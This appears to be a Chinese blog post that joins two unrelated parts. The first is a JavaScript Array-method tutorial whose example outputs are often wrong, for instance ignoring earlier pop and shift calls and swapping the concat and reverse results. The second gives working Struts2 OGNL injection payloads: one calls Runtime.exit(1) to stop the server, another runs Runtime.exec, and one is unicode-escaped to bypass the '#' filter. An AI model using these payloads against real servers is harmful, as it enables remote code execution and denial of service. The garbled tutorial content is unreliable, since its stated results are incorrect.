数组和function  都是对象，现在熟悉JS基础Array对象，有兴趣的同学一起来复习下吧。

array.pop : 删除数组内的最后一个对象

array.shift :删除数组内的第一个对象

array.join: 数组内元素弄成字符串插入页面

array.reverse : 数组内元素倒置

array.concat : 数组合并，但是谁与谁合并，要注意顺序

array.toString : 数组直接转为字符串，不再是对象了

array.valueOf : 显示原始的值，里面有什么东西

array.sort : 以ascii代码来排列先后顺序,但是数字不能用sort去排列。要排序请往下看，有例子哦。

array.push : 数组末端添加新对象，返回显示是数组长度

array.slice :删除数组内对象 slice( start , end)

array.splice : 删除添加对象

array.unshift : 前面插入对象，返回显示是数组长度

array.indexOf: 检查对象是否存在

下面来显示一些例子，让我们能够更明白是如何用的，计算机又是如何操作的。

var bb = ['qq','aa','ss','ee'];

var ooo = ['Nov','August'];

alert(bb.indexOf('qq'));// 返回0,因为qq是数组内的一个对象，位置是0

alert(bb.pop());//返回ee

alert(bb.shift());//返回qq

alert(bb.join( and ));//返回qq and aa and ss and ee

alert(bb.valueOf());//返回qq,aa,ss,ee

alert(bb.sort());//返回aa,ee,qq,ss

alert(bb.push("Lemon","Pineapple"));//返回6,因为数组已有六个对象，分别是：qq,aa,ss,ee,Lemon,Pineapple

alert(bb.slice(0,2));//返回qq,aa

alert(bb.splice(1,3,'lemon'));//返回aa,ss,ee,从aa起删除，除去长度为：三个

alert(bb.unshift('sunny'));//返回5,因为数组增加了一个对象，便由4变成了5

alert(bb.concat(ooo));//返回qq,aa,ss,ee

alert(bb.reverse());//返回ee,ss,aa,qq,Nov,August

 其实只要多练练就知道这些是怎么使用的了，多练习是灵活使用的前提。

数字排序，使用sort()方法，例子如下：

 var foo = [1,12,15,54,56,89,123,78];

 function num(a,b) {

     return a - b;

}

alert(foo.sort(num));// 返回1,12,15,54,56,78,89,123

现在就试试吧！

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true
&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new java.lang.Boolean("false")))
&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1 

OGNL处理时最终的结果就是
java.lang.Runtime.getRuntime().exit(1); 

----------------------------------------------------------------

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true
&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))
&(asdf)(('\u0023rt.exec("ifconfig")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

OGNL处理时最终的结果就是
java.lang.Runtime.getRuntime().exec("ifconfig") 

以上为struts2.1.2版本洗一下的一个漏洞。首先铺垫一下，上面代码执行结果为停掉当前运行的容器，getRuntime().exit(1);退出。
首先这个漏洞出现是因为OGNL 的用法。
 简单的介绍一下ognl概念去看百科吧，说一下用法：
 OGNL的方法调用:
  OGNL是在运行时调用方法的,这使得它无法做强制的类型检查,OGNL会去检索一个和它方法的各个参数最接近的一个方法进行使用,
  如果有多个方法满足这个条件,那么OGNL将任意调用其中的一个.(NULL和所有原始类型匹配,所以最有可能返回一个出乎意料的调用).
 OGNL也支持new object()的方法,产生一个新的对象,但是除了在java.lang包里的对象外,必须指明对象所在包的全名.
 OGNL支持直接调用类的静态方法.@class@method(args)
  eg：@abs(-12.345);
      @Java.lang.Math@floor(3.25);
      @Java.lang.Math@Sqrt(4);
 OGNL操作集合
  1操作列表Lists
   OGNL中Person in {"chinese", "japanese", '"Amercian"}
  2 操作映射
   OGNL中#{"foo" : "foovalue", "bar" : "barvalue"}
 OGNL有一个简化变量机制（在变量前加符号#），所有OGNL变量在整个表达式里是全局的。
  eg：#var
      #var = 99
      listeners.size().( #this > 100 ? 2 * #this : 20 + #this ) 调用listeners的size()并与100比较，
   #this为size的值，如果大于100则是返回两倍的size值。
   可以这样创建一个Map：
   #{“foo”: “foo value”, “bar”: “bar value” }
   #@java.util.LinkedHashMap@{“foo”: “foo value”, “bar”: “bar value” }
 OGNL 上下文变量
  #application
  #session
  #request
  #parameters
  #attr
  以上各值分别对应应用程序的不同层次的值，为了达到程序不被恶意修改在xwork包 com.opensymphony.xwork2.interceptor.PrepareInterceptor类中对#号进行了过滤。
  但没有过滤java中的unicode码，#的是\u0023
(未完待续。。)